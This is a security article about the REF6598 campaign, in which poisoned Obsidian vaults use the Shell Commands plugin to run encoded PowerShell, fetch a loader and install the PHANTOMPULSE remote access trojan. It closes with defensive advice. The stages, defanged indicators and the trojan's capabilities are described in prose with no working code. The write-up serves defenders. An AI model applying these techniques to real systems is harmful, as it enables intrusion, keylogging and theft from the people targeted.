Obsidian Plugin Abused to Deploy PhantomPulse RAT — Security Guide 2026

Published: 2026-05-11 Reading: 10 min Security / Supply Chain Attack

Event Overview — REF6598 Campaign

In April 2026, Elastic Security Labs disclosed a novel social engineering campaign tracked as REF6598 that abuses Obsidian, the popular cross-platform note-taking application, as an initial access vector to deliver a previously undocumented Windows remote access trojan called PHANTOMPULSE.

This campaign specifically targets individuals in the financial and cryptocurrency sectors. Rather than exploiting a software vulnerability, the attackers abused Obsidian's legitimate community plugin ecosystem — specifically the Shell Commands and Hider plugins — to silently execute malicious code when a victim opens a shared cloud vault. The attack chain includes an AI-assisted Windows backdoor that uses the Ethereum blockchain for command-and-control (C2) resolution.

The intrusion was detected and blocked early by Elastic Defend, but the technique is significant because it bypasses traditional security controls entirely by relying on the application's intended functionality. After Elastic's disclosure, the story hit the Hacker News front page, sparking widespread discussion about supply chain risks in the note-taking app ecosystem.

Attack Chain: How It Works

The REF6598 attack chain is cleverly designed and consists of multiple stages, with dedicated paths for both Windows and macOS:

Stage 0: Vault Poisoning

The attacker creates a malicious Obsidian vault hosted in cloud storage. Inside the vault's .obsidian/plugins/ directory, they install two community plugins:

• Shell Commands — a legitimate plugin that executes shell commands based on configurable triggers (startup, close, timed intervals)
• Hider — a UI-cleanup plugin that hides interface elements (status bar, tabs, scrollbars, tooltips) to conceal malicious activity

The data.json configuration file contains PowerShell commands set to execute on vault open.

Stage 1: PowerShell Execution

When the victim opens the vault, the Shell Commands plugin executes its pre-configured PowerShell commands via Invoke-Expression with Base64-encoded payloads. These commands:

1. Download script1.ps1 from a hardcoded IP address (195.3.222[.]251)
2. Execute the script with suppressed windows and bypassed execution policy

Stage 2: Loader Download & Operator Notification

The downloaded script uses BitsTransfer to fetch the next-stage binary (syncobs.exe) and reports progress back to the C2 with status codes:

• GFILE FOUND ON PC — download succeeded
• RDOWNLOAD ERROR — download failed, retrying
• GLAUNCH SUCCESS — binary executed
• GSESSION CLOSED — sequence completed

The tag parameter #OBSIDIAN identifies the infection vector, suggesting the operators may be running multiple concurrent campaigns using different lures.

Stage 3: PHANTOMPULL Loader

The downloaded syncobs.exe is a custom in-memory loader called PHANTOMPULL. It:

• Extracts an AES-256-CBC encrypted PE payload from its resources
• Decrypts and reflectively loads it entirely in memory
• Uses timer queue callback execution for stealth
• Contains fake integrity checks with dead code designed to waste analysts' time

This loader then connects to panel.fefea22134[.]net over HTTPS to download and decrypt the final PHANTOMPULSE payload.

Social Engineering Tactic: Fake Venture Capital Firm

The social engineering component is the most sophisticated part of this campaign. Attackers:

• Contact targets on LinkedIn under the guise of a venture capital firm
• Move the conversation to a Telegram group with multiple purported partners
• Discuss cryptocurrency liquidity solutions to create plausible business context
• Instruct the target to use Obsidian as the firm's "management database"
• Provide Obsidian account credentials for a shared cloud vault

The critical social engineering step: the victim must manually enable "Installed community plugins" sync in Obsidian settings. By default, this is disabled and cannot be turned on remotely. The attacker must convince the target to enable it, at which point the malicious plugin configuration syncs down and executes.

PhantomPulse RAT: AI-Generated Backdoor with Blockchain C2

PHANTOMPULSE is a full-featured Windows remote access trojan that Elastic Security Labs describes as "heavily AI-generated." Its standout features include:

Ethereum Blockchain C2 Resolution

Instead of a hardcoded C2 server address, PHANTOMPULSE resolves its command-and-control endpoint by:

• Fetching the latest Ethereum transaction from a hardcoded wallet address
• Extracting the C2 server address from transaction data
• Using WinHTTP for encrypted communications with the resolved server

This technique makes domain-based blocking insufficient — the C2 address changes with every new Ethereum transaction, providing attackers with nearly instant infrastructure rotation.

Capabilities

Once active, PHANTOMPULSE supports comprehensive remote access:

• inject — inject shellcode/DLL/EXE into running processes
• drop — drop files to disk and execute
• screenshot — capture and upload screenshots
• keylog — start/stop keystroke logging
• elevate — escalate privileges to SYSTEM via COM elevation moniker
• downgrade — transition from SYSTEM to elevated admin
• uninstall — remove persistence and clean up

Elastic Security Labs noted they identified a weakness in the C2 mechanism that allows security responders to take over the implants — a critical detail for defensive teams.

Cross-Platform Targeting: Windows & macOS

Attackers didn't stop at Windows. The macOS execution path uses:

• An obfuscated AppleScript dropper delivered via Shell Commands
• Iteration over a hardcoded domain list for C2 contact
• Telegram as a dead drop resolver for fallback C2 resolution
• Second-stage payload download via osascript

This dual-platform approach demonstrates the attackers' investment in making the campaign effective regardless of the target's operating system.

How Obsidian Users Can Protect Themselves

The REF6598 campaign highlights a critical lesson: even legitimate plugins in trusted applications can be weaponized. Here's how to stay safe:

1. Verify Plugin Sources Before Installing

• Only install plugins from the official Obsidian community plugin directory
• Check the plugin's GitHub repository for stars, recent activity, and maintainer reputation
• Be wary of plugins with minimal documentation or suspiciously new repositories
• Review the plugin's permissions and what system access it requests

2. Never Enable Community Plugin Sync for Untrusted Vaults

• The "Installed community plugins" and "Active community plugin list" sync toggles should be enabled only for vaults you trust
• If someone you don't know personally asks you to enable these settings, treat it as a major red flag
• Consider keeping these sync toggles disabled by default, enabling them only when you have explicitly installed and vetted the plugins yourself

3. Audit Your Shell Commands Plugin Configuration

• Regularly review the data.json file in .obsidian/plugins/obsidian-shellcommands/
• Check for any unexpected shell commands configured to run on startup or at intervals
• Remove the Shell Commands plugin if you don't actively use it

4. Use Endpoint Detection and Response (EDR)

• As Elastic demonstrated, behavior-based detection (not signature-based) is critical
• Monitor for PowerShell execution with Obsidian as the parent process
• Flag unexpected outbound network connections from Obsidian
• Consider using application whitelisting to prevent untrusted binary execution

5. Practice Good Security Hygiene

• Never use work credentials to access applications at someone else's request
• Treat unsolicited LinkedIn messages leading to Telegram groups as potentially malicious
• Keep your Obsidian application and all plugins updated to the latest versions
• Use a security solution that monitors for suspicious child process execution from trusted applications

6. For Organizations

• Establish clear policies around the use of personal productivity tools for business purposes
• Consider blocking or monitoring Obsidian community plugin sync over corporate networks
• Train employees on this specific attack vector — the LinkedIn → Telegram → Obsidian chain
• Deploy EDR solutions that can detect AI-generated malware and advanced injection techniques

Related Articles

• CloakBrowser Guide: Bypassing Bot Detection at the Source Level
• GrapheneOS Fixes Android VPN Leak While Google Refuses to Patch
• AI Agent + MCP Security Checklist: Permissions, Auditing & Least Exposure
• ClaudeBleed: Chrome Extension Security Flaw Exposes Claude Conversation Data
• cPanel Black Week: 3 New Vulnerabilities, 44,000 Servers Ransomwared
• Hardware Attestation as Monopoly Enabler — GrapheneOS Analysis
• 中文版：Obsidian 插件被滥用部署 PhantomPulse 远程访问木马 — 安全防护完整指南

Summary

The REF6598 campaign represents a new class of supply chain attack that abuses legitimate application features rather than software vulnerabilities. By weaponizing Obsidian's community plugin ecosystem, attackers can execute arbitrary code through a signed, trusted Electron application — making traditional signature-based detection largely ineffective.

Key takeaways:

• Social engineering remains the hardest security problem — the attacker's approach to gaining trust through LinkedIn and Telegram was carefully crafted
• Plugin ecosystems in productivity apps are an emerging attack surface — what happens with Obsidian today could happen with other platforms tomorrow
• Behavior-based detection is essential — Elastic Defend caught this attack by monitoring for abnormal process execution patterns from trusted parent processes
• Blockchain-powered C2 is an increasingly popular evasion technique among malware authors

Source: Elastic Security Labs — Phantom in the Vault

Additional coverage: The Hacker News — Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT